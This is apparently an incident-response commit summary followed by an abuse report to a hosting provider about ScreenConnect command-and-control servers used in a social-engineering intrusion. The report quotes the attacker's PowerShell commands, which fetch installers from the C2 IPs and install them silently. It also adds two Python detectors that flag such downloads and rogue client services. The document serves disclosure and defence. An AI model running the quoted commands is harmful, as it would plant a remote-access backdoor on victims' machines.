- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya)
- C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset
- IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise
- Conditional Access policies deployed (MFA, block foreign, block legacy auth)
- 38 stale test station accounts deleted from Entra
- Test datasheet pipeline investigated - data exists in DB, export step broken
- TestDataSheetUploader source code extracted for analysis

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Subject: Abuse Report - Unauthorized Remote Access C2 Servers on 80.76.49.18 and 45.88.91.99
To: abuses@virtuo.host
CC: noc@virtuo.host
Dear Virtuo Abuse Department,
We are reporting two IP addresses on your network that are being used as command-and-control servers for unauthorized remote access attacks against our client's infrastructure.
Offending IPs
- 80.76.49.18 (port 8041)
- 45.88.91.99 (port 8041)
Both IPs are on AS399486 (12651980 CANADA INC. / Virtuo).
Nature of Abuse
These servers are hosting self-hosted ConnectWise ScreenConnect (remote access) instances on ports 8040 (client download) and 8041 (relay), used to maintain persistent unauthorized access to victim machines. This is not a legitimate use of remote support software -- the clients are deployed silently via PowerShell commands executed during an active social engineering attack, then hidden from the Windows uninstall list using a third-party tool.
Evidence
Attack Timeline (March 27, 2026 - UTC-7)
- At approximately 08:28, an attacker using the alias "Angel Raya" connected to the victim machine via a ScreenConnect cloud relay (instance-wlb9ga-relay.screenconnect.com).
- At 08:29, the following commands were executed in a PowerShell session on the victim machine to download and silently install ScreenConnect clients from your infrastructure:
  powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
  powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
- The attacker then downloaded a tool from sordum.org ("Hide From Uninstall List") to conceal the rogue ScreenConnect installations from Windows Add/Remove Programs.
- At 11:55, a session identified as "Administrator" connected back through the 80.76.49.18 C2 server, confirming the backdoor was actively used for return access.
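The commands in the timeline above are a compact detection signature: a ScreenConnect client installer fetched from a host that is not the organisation's own relay, chained with a silent msiexec install, and followed by a tool for hiding the entry from Add/Remove Programs. The following detector is an added example written for this report, not code from the reporting organisation or from ConnectWise. It scans PowerShell script block text (the kind recorded in Event ID 4104 when script block logging is enabled) and grades each hit against the two relay IPs named in the report and a hypothetical allow list of the MSP's own relay (support.example-msp.invalid is a placeholder). The sample log lines are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Relay hosts the organisation legitimately deploys from (hypothetical allow list;
# replace with the real ScreenConnect instance hostnames).
ALLOWED_HOSTS = {"support.example-msp.invalid"}

# Relay hosts named in the abuse report above.
KNOWN_C2_HOSTS = {"80.76.49.18", "45.88.91.99"}

# A URL whose path ends in the ScreenConnect client installer, with the host and
# optional port captured separately.
URI_RE = re.compile(
    r"""https?://(?P<host>[^/:'"\s]+)(?::(?P<port>\d+))?/[^'"\s]*ScreenConnect\.ClientSetup\.msi[^'"\s]*""",
    re.IGNORECASE,
)
# msiexec invoked with a quiet/no-UI switch somewhere in the same command.
SILENT_RE = re.compile(r"msiexec.*?(?:/qn|/quiet)", re.IGNORECASE)
# The "Hide From Uninstall List" style tooling referenced in the report.
HIDE_RE = re.compile(r"hide\s*from\s*uninstall", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    host: str
    port: Optional[int]
    severity: str
    reason: str


def scan_script_blocks(lines: List[str]) -> List[Finding]:
    """Return one Finding per suspicious installer download or hide-tool use."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        for m in URI_RE.finditer(line):
            host = m.group("host")
            port = int(m.group("port")) if m.group("port") else (443 if line[m.start():m.start() + 5].lower() == "https" else 80)
            if host in KNOWN_C2_HOSTS:
                sev, why = "critical", "installer fetched from relay host named in the abuse report"
            elif host not in ALLOWED_HOSTS:
                sev, why = "high", "installer fetched from a host not on the relay allow list"
            else:
                sev, why = "info", "installer fetched from an approved relay"
            if SILENT_RE.search(line):
                why += "; silent msiexec install in the same command"
            findings.append(Finding(n, host, port, sev, why))
        if HIDE_RE.search(line):
            findings.append(Finding(n, "-", None, "high", "tool for hiding entries from Add/Remove Programs"))
    return findings


# Constructed sample script block text; line 1 mirrors the command quoted in the report.
SAMPLE_SCRIPT_BLOCKS = [
    "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' "
    "-OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', "
    "'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait",
    # A deployment from the (hypothetical) approved relay, for contrast.
    "Invoke-WebRequest -Uri 'https://support.example-msp.invalid/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'sc.msi'",
    # Unrelated administrative activity that must not alert.
    "Get-Process | Where-Object { $_.CPU -gt 100 }",
    # Constructed path standing in for the hide-from-uninstall tool.
    r"Start-Process 'C:\Users\Public\Hide From Uninstall List.exe'",
]

if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"line {f.line_no}: [{f.severity}] host={f.host} port={f.port} - {f.reason}")
```

Feed it exported 4104 script block text (one block per list entry) and triage the critical and high findings first; the "info" grade exists so that legitimate MSP deployments are visible but not alarming.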
ScreenConnect Service Details
Client connecting to 80.76.49.18:
- Service Name: ScreenConnect Client (0dfe1abae029411c)
- Session GUID: eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56
- Relay: 80.76.49.18:8041
- Version: 25.2.4.9229
Client connecting to 45.88.91.99:
- Service Name: ScreenConnect Client (a897d9a21259d116)
- Session GUID: 406bd356-cde4-4738-a22f-f776c8097686
- Relay: 45.88.91.99:8041
- Version: 25.2.4.9229
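The service names and relay addresses listed above are what a responder actually has to work from on an affected host: each rogue install is a Windows service named "ScreenConnect Client (instance id)" whose command line carries the relay host, port and session GUID. The script below is an added example for this report, not code from the reporting organisation or from ConnectWise. It assumes the client service command line has the form `"...\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=<host>&p=<port>&s=<session guid>&k=..."` (an assumption about ScreenConnect's client parameters) and compares every such service against a hypothetical allow list of the organisation's own relay. The sample service list is constructed; the two rogue entries use the identifiers from the report.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qs

# (host, port) pairs of relays the organisation itself operates (hypothetical).
ALLOWED_RELAYS = {("support.example-msp.invalid", 8041)}

SERVICE_NAME_RE = re.compile(r"^ScreenConnect Client \(([0-9a-f]{16})\)$")
# The second quoted argument of the service command line is a query string
# beginning with "?" (assumed ScreenConnect client parameter layout).
QUERY_RE = re.compile(r'"\?([^"]*)"')


@dataclass
class RelayInfo:
    service_name: str
    instance_id: str
    host: str
    port: int
    session_guid: str
    authorized: bool


def parse_screenconnect_service(name: str, path_name: str) -> Optional[RelayInfo]:
    """Extract relay details from a Win32_Service Name/PathName pair, or None if not a SC client."""
    m = SERVICE_NAME_RE.match(name)
    if not m:
        return None
    q = QUERY_RE.search(path_name)
    if not q:
        return None
    params = {k: v[0] for k, v in parse_qs(q.group(1), keep_blank_values=True).items()}
    host = params.get("h", "")
    port = int(params.get("p") or 0)
    return RelayInfo(
        service_name=name,
        instance_id=m.group(1),
        host=host,
        port=port,
        session_guid=params.get("s", ""),
        authorized=(host, port) in ALLOWED_RELAYS,
    )


def find_rogue_clients(services: Iterable[Tuple[str, str]]) -> List[RelayInfo]:
    """Return every ScreenConnect client service whose relay is not on the allow list."""
    rogue = []
    for name, path_name in services:
        info = parse_screenconnect_service(name, path_name)
        if info is not None and not info.authorized:
            rogue.append(info)
    return rogue


# Constructed (Name, PathName) pairs; the first two reuse the identifiers from the report,
# the key parameter is a placeholder.
SAMPLE_SERVICES = [
    ("ScreenConnect Client (0dfe1abae029411c)",
     r'"C:\Program Files (x86)\ScreenConnect Client (0dfe1abae029411c)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=80.76.49.18&p=8041&s=eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56&k=PLACEHOLDER"'),
    ("ScreenConnect Client (a897d9a21259d116)",
     r'"C:\Program Files (x86)\ScreenConnect Client (a897d9a21259d116)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=45.88.91.99&p=8041&s=406bd356-cde4-4738-a22f-f776c8097686&k=PLACEHOLDER"'),
    # The organisation's own (hypothetical) client, which must not be flagged.
    ("ScreenConnect Client (1234567890abcdef)",
     r'"C:\Program Files (x86)\ScreenConnect Client (1234567890abcdef)\ScreenConnect.ClientService.exe" '
     r'"?e=Access&y=Guest&h=support.example-msp.invalid&p=8041&s=00000000-0000-0000-0000-000000000000&k=PLACEHOLDER"'),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
]

if __name__ == "__main__":
    for r in find_rogue_clients(SAMPLE_SERVICES):
        print(f"ROGUE {r.service_name}: relay {r.host}:{r.port} session {r.session_guid}")
```

On a live host the (Name, PathName) pairs can be collected with `Get-CimInstance Win32_Service | Select-Object Name, PathName` and exported; anything this returns as rogue is a candidate for the "rogue clients removed" step and its relay host/port for the C2 block list.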
Additional Context
- The ScreenConnect MSI packages have file timestamps from April 8, 2025, indicating this infrastructure has been used for attacks for approximately one year.
- The victim's Microsoft 365 account was also subject to brute-force login attempts from IPs in Germany (45.86.202.x), Luxembourg, and Turkey during the same period, with a successful unauthorized sign-in from Istanbul, Turkey (91.93.232.236) on the same day.
Requested Action
We request that you:
- Immediately suspend the servers at 80.76.49.18 and 45.88.91.99
- Preserve all logs related to these IPs for law enforcement
- Provide any subscriber/billing information to law enforcement upon request
This incident is being reported to the FBI Internet Crime Complaint Center (IC3) and ConnectWise.
Reporting Organization
Arizona Computer Guru, LLC
Managed Service Provider
Phone: 520-304-8300
Email: support@azcomputerguru.com
Thank you for your prompt attention to this matter.